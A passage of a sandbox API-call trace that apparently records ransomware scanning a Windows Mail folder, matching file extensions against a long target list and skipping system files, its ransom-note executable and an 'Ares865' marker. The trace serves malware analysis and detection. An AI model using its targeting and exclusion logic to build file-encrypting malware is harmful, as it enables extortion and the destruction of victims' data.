lstrcmpiW (lpString1="unt", lpString2="mav") returned 1 [0041.812] lstrlenW (lpString="maw") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="maw") returned 1 [0041.812] lstrlenW (lpString="mdbhtml") returned 7 [0041.812] lstrcmpiW (lpString1="account", lpString2="mdbhtml") returned -1 [0041.812] lstrlenW (lpString="mdn") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mdn") returned 1 [0041.813] lstrlenW (lpString="mdt") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mdt") returned 1 [0041.813] lstrlenW (lpString="mfd") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mfd") returned 1 [0041.813] lstrlenW (lpString="mpd") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mpd") returned 1 [0041.813] lstrlenW (lpString="mrg") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mrg") returned 1 [0041.813] lstrlenW (lpString="mud") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mud") returned 1 [0041.813] lstrlenW (lpString="mwb") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="mwb") returned 1 [0041.813] lstrlenW (lpString="myd") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="myd") returned 1 [0041.813] lstrlenW (lpString="ndf") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="ndf") returned 1 [0041.813] lstrlenW (lpString="nnt") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="nnt") returned 1 [0041.813] lstrlenW (lpString="nrmlib") returned 6 [0041.813] lstrcmpiW (lpString1="ccount", lpString2="nrmlib") returned -1 [0041.813] lstrlenW (lpString="ns2") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="ns2") returned 1 [0041.813] lstrlenW (lpString="ns3") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="ns3") returned 1 [0041.813] lstrlenW (lpString="ns4") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="ns4") returned 1 [0041.813] lstrlenW (lpString="nsf") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="nsf") returned 1 [0041.813] lstrlenW (lpString="nv") returned 2 [0041.813] lstrcmpiW (lpString1="nt", lpString2="nv") returned -1 [0041.813] lstrlenW (lpString="nv2") returned 3 [0041.813] lstrcmpiW (lpString1="unt", lpString2="nv2") returned 1 [0041.813] lstrlenW (lpString="nwdb") returned 4 [0041.813] lstrcmpiW (lpString1="ount", lpString2="nwdb") returned 1 [0041.814] lstrlenW (lpString="nyf") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="nyf") returned 1 [0041.814] lstrlenW (lpString="odb") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0041.814] lstrlenW (lpString="odb") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0041.814] lstrlenW (lpString="oqy") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="oqy") returned 1 [0041.814] lstrlenW (lpString="ora") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="ora") returned 1 [0041.814] lstrlenW (lpString="orx") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="orx") returned 1 [0041.814] lstrlenW (lpString="owc") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="owc") returned 1 [0041.814] lstrlenW (lpString="p96") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="p96") returned 1 [0041.814] lstrlenW (lpString="p97") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="p97") returned 1 [0041.814] lstrlenW (lpString="pan") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="pan") returned 1 [0041.814] lstrlenW (lpString="pdb") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="pdb") returned 1 [0041.814] lstrlenW (lpString="pdm") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="pdm") returned 1 [0041.814] lstrlenW (lpString="pnz") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="pnz") returned 1 [0041.814] lstrlenW (lpString="qry") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="qry") returned 1 [0041.814] lstrlenW (lpString="qvd") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="qvd") returned 1 [0041.814] lstrlenW (lpString="rbf") returned 3 [0041.814] lstrcmpiW (lpString1="unt", lpString2="rbf") returned 1 [0041.814] lstrlenW (lpString="rctd") returned 4 [0041.814] lstrcmpiW (lpString1="ount", lpString2="rctd") returned -1 [0041.814] lstrlenW (lpString="rod") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="rod") returned 1 [0041.815] lstrlenW (lpString="rodx") returned 4 [0041.815] lstrcmpiW (lpString1="ount", lpString2="rodx") returned -1 [0041.815] lstrlenW (lpString="rpd") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="rpd") returned 1 [0041.815] lstrlenW (lpString="rsd") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="rsd") returned 1 [0041.815] lstrlenW (lpString="sas7bdat") returned 8 [0041.815] lstrcmpiW (lpString1="eaccount", lpString2="sas7bdat") returned -1 [0041.815] lstrlenW (lpString="sbf") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="sbf") returned 1 [0041.815] lstrlenW (lpString="scx") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="scx") returned 1 [0041.815] lstrlenW (lpString="sdb") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="sdb") returned 1 [0041.815] lstrlenW (lpString="sdc") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="sdc") returned 1 [0041.815] lstrlenW (lpString="sdf") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="sdf") returned 1 [0041.815] lstrlenW (lpString="sis") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="sis") returned 1 [0041.815] lstrlenW (lpString="spq") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="spq") returned 1 [0041.815] lstrlenW (lpString="te") returned 2 [0041.815] lstrcmpiW (lpString1="nt", lpString2="te") returned -1 [0041.815] lstrlenW (lpString="teacher") returned 7 [0041.815] lstrcmpiW (lpString1="account", lpString2="teacher") returned -1 [0041.815] lstrlenW (lpString="tmd") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="tmd") returned 1 [0041.815] lstrlenW (lpString="tps") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="tps") returned 1 [0041.815] lstrlenW (lpString="trc") returned 3 [0041.815] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0041.815] lstrlenW (lpString="trc") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0041.816] lstrlenW (lpString="trm") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="trm") returned 1 [0041.816] lstrlenW (lpString="udb") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="udb") returned 1 [0041.816] lstrlenW (lpString="udl") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="udl") returned 1 [0041.816] lstrlenW (lpString="usr") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="usr") returned -1 [0041.816] lstrlenW (lpString="v12") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="v12") returned -1 [0041.816] lstrlenW (lpString="vis") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="vis") returned -1 [0041.816] lstrlenW (lpString="vpd") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="vpd") returned -1 [0041.816] lstrlenW (lpString="vvv") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="vvv") returned -1 [0041.816] lstrlenW (lpString="wdb") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="wdb") returned -1 [0041.816] lstrlenW (lpString="wmdb") returned 4 [0041.816] lstrcmpiW (lpString1="ount", lpString2="wmdb") returned -1 [0041.816] lstrlenW (lpString="wrk") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="wrk") returned -1 [0041.816] lstrlenW (lpString="xdb") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="xdb") returned -1 [0041.816] lstrlenW (lpString="xld") returned 3 [0041.816] lstrcmpiW (lpString1="unt", lpString2="xld") returned -1 [0041.816] lstrlenW (lpString="xmlff") returned 5 [0041.816] lstrcmpiW (lpString1="count", lpString2="xmlff") returned -1 [0041.816] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6535940, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6535940, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf657b4d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0041.816] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.816] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="aoldtz.exe") returned -1 [0041.816] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".") returned 1 [0041.816] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="..") returned 1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="windows") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="bootmgr") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="temp") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="pagefile.sys") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="boot") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="ids.txt") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="ntuser.dat") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="perflogs") returned -1 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="MSBuild") returned -1 [0041.817] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0041.817] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 115 [0041.817] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" | out: lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" [0041.817] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0041.817] lstrlenW (lpString="Ares865") returned 7 [0041.817] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0041.817] lstrlenW (lpString=".dll") returned 4 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".dll") returned 1 [0041.817] lstrlenW (lpString=".lnk") returned 4 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".lnk") returned 1 [0041.817] lstrlenW (lpString=".ini") returned 4 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".ini") returned 1 [0041.817] lstrlenW (lpString=".sys") returned 4 [0041.817] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".sys") returned 1 [0041.817] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0041.817] lstrlenW (lpString="bak") returned 3 [0041.817] lstrcmpiW (lpString1="unt", lpString2="bak") returned 1 [0041.817] lstrlenW (lpString="ba_") returned 3 [0041.817] lstrcmpiW (lpString1="unt", lpString2="ba_") returned 1 [0041.817] lstrlenW (lpString="dbb") returned 3 [0041.817] lstrcmpiW (lpString1="unt", lpString2="dbb") returned 1 [0041.817] lstrlenW (lpString="vmdk") returned 4 [0041.817] lstrcmpiW (lpString1="ount", lpString2="vmdk") returned -1 [0041.817] lstrlenW (lpString="rar") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="rar") returned 1 [0041.818] lstrlenW (lpString="zip") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="zip") returned -1 [0041.818] lstrlenW (lpString="tgz") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="tgz") returned 1 [0041.818] lstrlenW (lpString="vbox") returned 4 [0041.818] lstrcmpiW (lpString1="ount", lpString2="vbox") returned -1 [0041.818] lstrlenW (lpString="vdi") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="vdi") returned -1 [0041.818] lstrlenW (lpString="vhd") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="vhd") returned -1 [0041.818] lstrlenW (lpString="vhdx") returned 4 [0041.818] lstrcmpiW (lpString1="ount", lpString2="vhdx") returned -1 [0041.818] lstrlenW (lpString="avhd") returned 4 [0041.818] lstrcmpiW (lpString1="ount", lpString2="avhd") returned 1 [0041.818] lstrlenW (lpString="db") returned 2 [0041.818] lstrcmpiW (lpString1="nt", lpString2="db") returned 1 [0041.818] lstrlenW (lpString="db2") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="db2") returned 1 [0041.818] lstrlenW (lpString="db3") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="db3") returned 1 [0041.818] lstrlenW (lpString="dbf") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="dbf") returned 1 [0041.818] lstrlenW (lpString="mdf") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="mdf") returned 1 [0041.818] lstrlenW (lpString="mdb") returned 3 [0041.818] lstrcmpiW (lpString1="unt", lpString2="mdb") returned 1 [0041.818] lstrlenW (lpString="sql") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="sql") returned 1 [0041.819] lstrlenW (lpString="sqlite") returned 6 [0041.819] lstrcmpiW (lpString1="ccount", lpString2="sqlite") returned -1 [0041.819] lstrlenW (lpString="sqlite3") returned 7 [0041.819] lstrcmpiW (lpString1="account", lpString2="sqlite3") returned -1 [0041.819] lstrlenW (lpString="sqlitedb") returned 8 [0041.819] lstrcmpiW (lpString1="eaccount", lpString2="sqlitedb") returned -1 [0041.819] lstrlenW (lpString="xml") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="xml") returned -1 [0041.819] lstrlenW (lpString="$er") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="$er") returned 1 [0041.819] lstrlenW (lpString="4dd") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="4dd") returned 1 [0041.819] lstrlenW (lpString="4dl") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="4dl") returned 1 [0041.819] lstrlenW (lpString="^^^") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="^^^") returned 1 [0041.819] lstrlenW (lpString="abs") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="abs") returned 1 [0041.819] lstrlenW (lpString="abx") returned 3 [0041.819] lstrcmpiW (lpString1="unt", lpString2="abx") returned 1 [0041.819] lstrlenW (lpString="accdb") returned 5 [0041.819] lstrcmpiW (lpString1="count", lpString2="accdb") returned 1 [0041.819] lstrlenW (lpString="accdc") returned 5 [0041.819] lstrcmpiW (lpString1="count", lpString2="accdc") returned 1 [0041.819] lstrlenW (lpString="accde") returned 5 [0041.819] lstrcmpiW (lpString1="count", lpString2="accde") returned 1 [0041.819] lstrlenW (lpString="accdr") returned 5 [0041.819] lstrcmpiW (lpString1="count", lpString2="accdr") returned 1 [0041.819] lstrlenW (lpString="accdt") returned 5 [0041.819] lstrcmpiW (lpString1="count", lpString2="accdt") returned 1 [0041.819] lstrlenW (lpString="accdw") returned 5 [0041.819] lstrcmpiW (lpString1="count", lpString2="accdw") returned 1 [0041.819] lstrlenW (lpString="accft") returned 5 [0041.820] lstrcmpiW (lpString1="count", lpString2="accft") returned 1 [0041.820] lstrlenW (lpString="adb") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0041.820] lstrlenW (lpString="adb") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0041.820] lstrlenW (lpString="ade") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="ade") returned 1 [0041.820] lstrlenW (lpString="adf") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="adf") returned 1 [0041.820] lstrlenW (lpString="adn") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="adn") returned 1 [0041.820] lstrlenW (lpString="adp") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="adp") returned 1 [0041.820] lstrlenW (lpString="alf") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="alf") returned 1 [0041.820] lstrlenW (lpString="ask") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="ask") returned 1 [0041.820] lstrlenW (lpString="btr") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="btr") returned 1 [0041.820] lstrlenW (lpString="cat") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="cat") returned 1 [0041.820] lstrlenW (lpString="cdb") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="cdb") returned 1 [0041.820] lstrlenW (lpString="ckp") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="ckp") returned 1 [0041.820] lstrlenW (lpString="cma") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="cma") returned 1 [0041.820] lstrlenW (lpString="cpd") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="cpd") returned 1 [0041.820] lstrlenW (lpString="dacpac") returned 6 [0041.820] lstrcmpiW (lpString1="ccount", lpString2="dacpac") returned -1 [0041.820] lstrlenW (lpString="dad") returned 3 [0041.820] lstrcmpiW (lpString1="unt", lpString2="dad") returned 1 [0041.820] lstrlenW (lpString="dadiagrams") returned 10 [0041.820] lstrcmpiW (lpString1=".oeaccount", lpString2="dadiagrams") returned -1 [0041.821] lstrlenW (lpString="daschema") returned 8 [0041.821] lstrcmpiW (lpString1="eaccount", lpString2="daschema") returned 1 [0041.821] lstrlenW (lpString="db-journal") returned 10 [0041.821] lstrcmpiW (lpString1=".oeaccount", lpString2="db-journal") returned -1 [0041.821] lstrlenW (lpString="db-shm") returned 6 [0041.821] lstrcmpiW (lpString1="ccount", lpString2="db-shm") returned -1 [0041.821] lstrlenW (lpString="db-wal") returned 6 [0041.821] lstrcmpiW (lpString1="ccount", lpString2="db-wal") returned -1 [0041.821] lstrlenW (lpString="dbc") returned 3 [0041.821] lstrcmpiW (lpString1="unt", lpString2="dbc") returned 1 [0041.821] lstrlenW (lpString="dbs") returned 3 [0041.821] lstrcmpiW (lpString1="unt", lpString2="dbs") returned 1 [0041.821] lstrlenW (lpString="dbt") returned 3 [0041.821] lstrcmpiW (lpString1="unt", lpString2="dbt") returned 1 [0041.821] lstrlenW (lpString="dbv") returned 3 [0041.821] lstrcmpiW (lpString1="unt", lpString2="dbv") returned 1 [0041.821] lstrlenW (lpString="dbx") returned 3 [0041.821] lstrcmpiW (lpString1="unt", lpString2="dbx") returned 1 [0041.821] lstrlenW (lpString="dcb") returned 3 [0041.821] lstrcmpiW (lpString1="unt", lpString2="dcb") returned 1 [0041.821] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" | out: lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" [0041.821] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0041.821] lstrlenW (lpString="Ares865") returned 7 [0041.821] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0041.821] lstrlenW (lpString=".dll") returned 4 [0041.821] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".dll") returned 1 [0041.821] lstrlenW (lpString=".lnk") returned 4 [0041.821] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".lnk") returned 1 [0041.821] lstrlenW (lpString=".ini") returned 4 [0041.821] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".ini") returned 1 [0041.821] lstrlenW (lpString=".sys") returned 4 [0041.821] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".sys") returned 1 [0041.822] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0041.822] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="Backup" | out: lpString1="Backup") returned="Backup" [0041.822] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0041.822] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e9d90 [0041.822] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0041.822] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7bc3a13, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="aoldtz.exe") returned 1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2=".") returned 1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="..") returned 1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="windows") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="bootmgr") returned 1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="temp") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="pagefile.sys") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="boot") returned 1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="ids.txt") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="ntuser.dat") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="perflogs") returned -1 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2="MSBuild") returned -1 [0041.822] lstrlenW (lpString="edb.chk") returned 7 [0041.822] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned 66 [0041.822] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="edb.chk" | out: lpString1="edb.chk") returned="edb.chk" [0041.822] lstrlenW (lpString="edb.chk") returned 7 [0041.822] lstrlenW (lpString="Ares865") returned 7 [0041.822] lstrlenW (lpString=".dll") returned 4 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2=".dll") returned 1 [0041.822] lstrlenW (lpString=".lnk") returned 4 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2=".lnk") returned 1 [0041.822] lstrlenW (lpString=".ini") returned 4 [0041.822] lstrcmpiW (lpString1="edb.chk", lpString2=".ini") returned 1 [0041.822] lstrlenW (lpString=".sys") returned 4 [0041.823] lstrcmpiW (lpString1="edb.chk", lpString2=".sys") returned 1 [0041.823] lstrlenW (lpString="edb.chk") returned 7 [0041.823] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="edb.log" | out: lpString1="edb.log") returned="edb.log" [0041.823] lstrlenW (lpString="edb.log") returned 7 [0041.823] lstrlenW (lpString="Ares865") returned 7 [0041.823] lstrlenW (lpString=".dll") returned 4 [0041.823] lstrcmpiW (lpString1="edb.log", lpString2=".dll") returned 1 [0041.823] lstrlenW (lpString=".lnk") returned 4 [0041.823] lstrcmpiW (lpString1="edb.log", lpString2=".lnk") returned 1 [0041.823] lstrlenW (lpString=".ini") returned 4 [0041.823] lstrcmpiW (lpString1="edb.log", lpString2=".ini") returned 1 [0041.823] lstrlenW (lpString=".sys") returned 4 [0041.823] lstrcmpiW (lpString1="edb.log", lpString2=".sys") returned 1 [0041.823] lstrlenW (lpString="edb.log") returned 7 [0041.823] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0041.823] lstrlenW (lpString="edb00001.log") returned 12 [0041.823] lstrlenW (lpString="Ares865") returned 7 [0041.823] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0041.823] lstrlenW (lpString=".dll") returned 4 [0041.823] lstrcmpiW (lpString1="edb00001.log", lpString2=".dll") returned 1 [0041.823] lstrlenW (lpString=".lnk") returned 4 [0041.823] lstrcmpiW (lpString1="edb00001.log", lpString2=".lnk") returned 1 [0041.823] lstrlenW (lpString=".ini") returned 4 [0041.823] lstrcmpiW (lpString1="edb00001.log", lpString2=".ini") returned 1 [0041.823] lstrlenW (lpString=".sys") returned 4 [0041.823] lstrcmpiW (lpString1="edb00001.log", lpString2=".sys") returned 1 [0041.823] lstrlenW (lpString="edb00001.log") returned 12 [0041.823] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="edbres00001.jrs" | out: lpString1="edbres00001.jrs") returned="edbres00001.jrs" [0041.824] lstrlenW (lpString="edbres00001.jrs") returned 15 [0041.824] lstrlenW (lpString="Ares865") returned 7 [0041.824] lstrcmpiW (lpString1="001.jrs", lpString2="Ares865") returned -1 [0041.824] lstrlenW (lpString=".dll") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".dll") returned 1 [0041.824] lstrlenW (lpString=".lnk") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".lnk") returned 1 [0041.824] lstrlenW (lpString=".ini") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".ini") returned 1 [0041.824] lstrlenW (lpString=".sys") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".sys") returned 1 [0041.824] lstrlenW (lpString="edbres00001.jrs") returned 15 [0041.824] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="edbres00002.jrs" | out: lpString1="edbres00002.jrs") returned="edbres00002.jrs" [0041.824] lstrlenW (lpString="edbres00002.jrs") returned 15 [0041.824] lstrlenW (lpString="Ares865") returned 7 [0041.824] lstrcmpiW (lpString1="002.jrs", lpString2="Ares865") returned -1 [0041.824] lstrlenW (lpString=".dll") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".dll") returned 1 [0041.824] lstrlenW (lpString=".lnk") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".lnk") returned 1 [0041.824] lstrlenW (lpString=".ini") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".ini") returned 1 [0041.824] lstrlenW (lpString=".sys") returned 4 [0041.824] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".sys") returned 1 [0041.824] lstrlenW (lpString="edbres00002.jrs") returned 15 [0041.824] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="oeold.xml" | out: lpString1="oeold.xml") returned="oeold.xml" [0041.824] lstrlenW (lpString="oeold.xml") returned 9 [0041.824] lstrlenW (lpString="Ares865") returned 7 [0041.824] lstrcmpiW (lpString1="old.xml", lpString2="Ares865") returned 1 [0041.824] lstrlenW (lpString=".dll") returned 4 [0041.824] lstrcmpiW (lpString1="oeold.xml", lpString2=".dll") returned 1 [0041.824] lstrlenW (lpString=".lnk") returned 4 [0041.825] lstrcmpiW 